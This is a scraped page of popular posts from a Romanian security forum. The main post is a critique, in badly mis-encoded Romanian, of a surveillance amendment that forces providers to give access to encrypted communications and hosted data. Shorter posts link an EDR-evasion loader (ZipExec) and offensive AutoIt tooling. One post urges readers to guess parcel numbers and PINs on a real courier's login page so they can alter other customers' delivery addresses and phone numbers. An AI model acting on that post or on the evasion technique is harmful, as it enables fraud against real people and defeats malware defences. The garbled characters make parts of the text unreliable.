improprii) ╚Öi art 102 inserat ├«ntr-o zon─â care n-are nimic de a face cu subiectul celorlalte 299 de pagini: Art.10^2. ÔÇö (1) Furnizorii de servicii de g─âzduire electronic─â cu resurse IP ┼či furnizorii de servicii de comunica┼úii interpersonale care nu se bazeaz─â pe numere au obliga┼úia s─â sprijine organele de aplicare a legii ┼či organele cu atribu┼úii ├«n domeniul securit─â┼úii na┼úionale, ├«n limitele competen┼úelor acestora, pentru punerea ├«n executare a metodelor de supraveghere tehnic─â ori a actelor de autorizare dispuse ├«n conformitate cu dispozi┼úiile Legii nr. 135/2010 privind Codul de procedur─â penal─â, cu modific─ârile ┼či complet─ârile ulterioare, ┼či ale Legii nr. 51/1991 privind securitatea na┼úional─â, republicat─â, cu modific─ârile ┼či complet─ârile ulterioare, respectiv: a) s─â permit─â interceptarea legal─â a comunica┼úiilor, inclusiv s─â suporte costurile aferente; b) s─â acorde accesul la con┼úinutul comunica┼úiilor criptate tranzitate ├«n re┼úelele proprii; c) s─â furnizeze informa┼úiile re┼úinute sau stocate referitoare la date de trafic, date de identificare a abona┼úilor sau clien┼úilor, modalit─â┼úi de plat─â ┼či istoricul acces─ârilor cu momentele de timp aferente; d) s─â permit─â, ├«n cazul furnizorilor de servicii de g─âzduire electronic─â cu resurse IP, accesul la propriile sisteme informatice, ├«n vederea copierii sau extragerii datelor existente. (2) Obliga┼úiile prev─âzute la alin. (1) lit. a) - c) se aplic─â ├«n mod corespunz─âtor ┼či furnizorilor de re┼úele sau servicii de comunica┼úii electronice. III. Cine sunt ─â╚Ötia??? Pentru cei pierdu╚Ťi ├«n textul ce pare un acrostih dar nu este, sa explic─âm trei termeni: ÔÇ×Furnizorii de servicii de g─âzduire electronic─â cu resurse IPÔÇŁ ÔÇô sunt de fapt aceia╚Öi cu furnizorii de g─âzduire web (de fapt, deja reglementa╚Ťi ├«n legea 365/2002), care ofer─â serviciile ÔÇ×pe teritoriul Rom├ónieiÔÇŁ conform defini╚Ťiei nou inventate din art 4 alineatul (1), noul punct 9^5. ÔÇ×Serviciu de comunica╚Ťii interpersonale care nu se bazeaz─â pe numereÔÇŁ ÔÇô este ce se numea acum c├ó╚Ťiva ani ÔÇ×mesagerie instatanee sau mesaje chatÔÇŁ ╚Öi practic intra ├«n categoria asta Skype, WhatsApp, Facebook Messanger, Signal, Wire, Telegram sau pentru cei mai nostalgici Yahoo Messanger, AIM, ICQ sau chiar IRC. Pentru o minte (sau altceva) mai crea╚Ť─â, ar fi un serviciu de comunica╚Ťii interpersonale care se integreaz─â perfect ├«n defini╚Ťia imberb─â din art 4 alineatul (1), noul punct 9^3 chiar ╚Öi Chaturbate sau LiveJasmin. (ca s─â se cl─âteasc─â ╚Öi ochiul lor, c─â s─â zic a╚Öa). Aten╚Ťie, ace╚Ötia nu sunt doar cei care ofer─â serviciile ÔÇ× pe teritoriul Rom├ónieiÔÇŁ. (cuv├ónt cheie- indiciu: ÔÇ×tranzitatÔÇŁ) ÔÇ×Organele cu atribu┼úii ├«n domeniul securit─â┼úii na┼úionaleÔÇŁ- este aceia╚Öi terminologie vag─â deja declarat─â neconstitu╚Ťional─â ├«n 2008 (╚Öi alte decizii). Oricum nimeni nu este ├«n stare sa fac─â lista lor, cu at├ót mai mult cu privire la atribu╚Ťiile exacte, legea din 1991 find la fel de vag─â ╚Öi ast─âzi. IV. Ce trebuie s─â fac─â??? Aspectele legate de interceptarea legal─â comunica╚Ťiilor, cu toate garan╚Ťiile de rigoare (ma rog, p├ón─â la noi decizii de neconstitu╚Ťionalitate, eu zic ca decizia din 2016 e doar prima dintr-un ╚Öir dac─â nu se rezolv─â ni╚Öte probleme de fond) sunt prev─âzute de Codul de Procedur─â Penal─â (CPP). ├Än mod logic, dac─â ar fi vreo problem─â sau este nevoie de actualizarea lor s-ar face tot printr-o modificare la acest cod. (indiciu: e o lege organic─â, greu de modificat). Doar c─â dincolo de a impune obliga╚Ťii similare ╚Öi unor alte categorii furnizori (care oricum, nu au leg─âtura cu ANCOM) pe unde se plimb─â ├«n 2021 con╚Ťinutul ╚Öi legal, ╚Öi ilegal. (poate de discutat, dar atunci ar trebui ├«n CPP ╚Öi nu pe ╚Öest), textul l─ârge╚Öte mult spectrul de ac╚Ťiuni de intercept─âri ╚Öi acces, pe care CPP nu le prevede. M─â opresc doar la 2 aici: ÔÇ×accesul la con┼úinutul comunica┼úiilor criptate tranzitate ├«n re┼úelele proprii;ÔÇŁ nu exist─â ├«n CPP. Dincolo de faptul ca un furnizor (inclusiv cei de comunica╚Ťii) ar trebui s─â ├«╚Öi creeze un sistem de depistare a con╚Ťinutului criptate tranzitat, eu cred c─â ╚Ťinta sunt furnizorii care ofer─â astfel de servicii. Aici sunt 2 variante ÔÇô fie vor con╚Ťinutul decriptat direct de la furnizor sau pentru ca vor s─â sparg─â criptarea? (c├ót de legal, ilegal ar fi, este o alt─â discu╚Ťie) , fie vor con╚Ťinutul criptat pentru c─â vor s─â ob╚Ťin─â/determine partea care are cheia de criptare s─â o dezv─âluie cumva. Astea, ca ╚Öi altele din acela╚Öi spectru ridic─â ni╚Öte subiecte de privacy ╚Öi security mult prea complexe pentru a le rezolva ├«n 2 propozi╚Ťii (dau ├«ns─â 2 linkuri - Bugs in our Pockets: The Risks of Client-Side Scanning ╚Öi un document leak-uit de la Comisie) S─â nu mai zicem c─â textul Directivei de implementat zice exact pe dos ÔÇô promova╚Ťi criptarea, nu o submina╚Ťi: ÔÇ×ar trebui promovat─â de exemplu utilizarea cript─ârii, end-to-end dac─â este cazul, ╚Öi, dac─â este necesar, criptarea ar trebui s─â fie obligatorie ├«n conformitate cu principiile securit─â╚Ťii ╚Öi protej─ârii vie╚Ťii private ├«n mod implicit ╚Öi din faza de proiectareÔÇŁ ÔÇ×s─â permit─â, ├«n cazul furnizorilor de servicii de g─âzduire (...) accesul la propriile sisteme informatice, ├«n vederea copierii sau extragerii datelor existente.ÔÇŁnu exist─â ├«n CPP. O terminologie la fel de vag─â ca cea din defuncta lege a securit─â╚Ťii cibernetice (declarata neconstitu╚Ťional─â ├«n 2015) face ca s─â ai practic acces la orice con╚Ťinut de pe orice server din Rom├ónia ├«n condi╚Ťii total neclare. (asta e demn─â de capabilit─â╚Ťile NSA) Vrei acces la documenta╚Ťia unui jurnalist? Nu accesezi redac╚Ťia, ci serviciul de g─âzduire al redac╚Ťiei. Oricum presa era la amenin╚Ť─âri de ÔÇ×securitate na╚Ťional─âÔÇŁ, nu? Capisci? V. Deci: ├Äncolonarea ╚Öi ├«nregistrarea Ca s─â poat─â probabil s─â justifice cumva integrarea ├«n aceast─â lege, propunerea normativ─â mai ╚Öi creeaz─â o obliga╚Ťie de ├«nregistrare a acestor noi furnizori la ANCOM, ceea ce contrazice flagrant legisla╚Ťia european─â ├«n domeniu (├«n principal directiva e-commerce, implementat─â la noi prin legea 365/2002). Dar ce mai conteaz─â o obliga╚Ťie europeana, c├ónd e ├«n joc ÔÇ×securitatea na╚Ťional─âÔÇŁ? Important e c─â le putem impune s─â ├«╚Öi creeze, pe costuri proprii, infrastructura de interceptare ╚Öi c├ónd vine o h├órtie de la ÔÇ×organÔÇŁ s─â dea tot. VI. Concluzie? Dincolo de orice discu╚Ťie pe fond, a propune astfel de solu╚Ťii legislative de interceptare a comunica╚Ťiilor pe u╚Öa din dos, evit├ónd orice dezbatere public─â nu este doar profund nedemocratic─â, dar chiar jignitoare la adresa unui popor exact ├«ntr-un moment ├«n care ar trebui s─â fie convins de acela╚Öi stat c─â ├«i vrea binele prin m─âsurile propuse, nu c─â de fapt sunt ni╚Öte cobai, inclusiv pentru unele m─âsuri de supraveghere ÔÇ×semnate ca primarul.ÔÇŁ Sau cine ╚Ötie poate se treze╚Öte Senatul, presa sau cet─â╚Ťenii s─â ├«i ia la ni╚Öte ├«ntreb─âri ÔÇô cine a propus, de fapt, textul? De ce acum? De ce aici? De ce acest text ╚Öi nu altul? De ce nu ├«n CPP? De ce nu s-a f─âcut vreo dezbatere public─â? PS: Am ata╚Öat la articol un document unde am OCR-izat textele relevante strecurate dup─â dezbaterea public─â, pentru a nu v─â obliga s─â c─âuta╚Ťi ├«n peste 900 de pagini cu imagini exact unde sunt textele cu pricina... Sursa: https://apti.ro/largirea-interceptarii-comunicatiilor-electronice-impusa-pe-sest?
    5 points
  40. ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms. https://github.com/Tylous/ZipExec
    5 points
  41. "Buna ziua !Eu sunt Ionu╚Ť ╚Öi m-am vaccinat! " Suna a ├«nt├ólnire AA ­čśü
    5 points
  42. Daca tot n-au bug bounty, plm have fun . Linkul ar veni ceva gen "https://dm.mygls.ro/Account/Login?parcelNumber=11111111111&pin=11af" Daca gasesti valorile potrivite, poti sa intrii in comanda respectiva si sa modifici adresa de livrare + numar de telefon Enjoy!
    4 points
  43. Ideea e ca RST nu e singurul forum care nu prea mai merge. Nici un forum nu mai merge. Si nu ma refer doar la cele de IT, forumuri de orice fel. Una dintre "probleme" o reprezinta chiar aceste porcarii (din punctul meu de vedere) de grupuri de Facebook. Sunt usor de accesat si toata lumea isi da cu parerea, doar ca parerile sunt de multe ori idioate (e.g. grupuri de masini). In plus, e haos, nu e nici o organizare, sunt posturi aruncate la gramada fara nici un sens si greu de urmarit. Avem pagina de Facebook dar nu o folosim ca nu ajuta prea mult. Mie mi-ar placea sa se intoarca lumea la forumuri, mie imi plac mult si gasesc rapid ce am nevoie (e.g. Softpedia). Ar mai fi si acele grupuri de WhatsApp, Telegram sau Discord unde povestea e aceeasi. Daca ai o intrebare totul depinde de "persoanele care sunt pe faza". Pe un forum se pot vedea ulterior si practic toate postarile. Mai exact nu imi dau seama ce am putea face ca nu putem schimba mentalitati. Noi ne facem treaba si suntem pe baricade. RST Con #2 e o idee prin care vreau sa readuc activitate pe forum. Deci, cineva interesat de o prezentare? De creat exercitii CTF?
    4 points
  44. OffensiveAutoIt Offensive tooling notes and experiments in AutoIt v3. Table of Contents OffensiveAutoIt Why AutoIt? OffensiveAutoIt scripts Using AutoIt scripts Compiling scripts into standalone executables Using scripts without compilation into executables AutoIt3.exe AutoItX Setting up a dev environment Debugging Decompiling AutoIt executables Decompiling .a3x files Obfuscating scripts AutoIt in the wild Detection YARA rules Miscellaneous Blog posts Interesting AutoIt projects Sursa: https://github.com/V1V1/OffensiveAutoIt
    4 points
├Ś
×
  • Create New...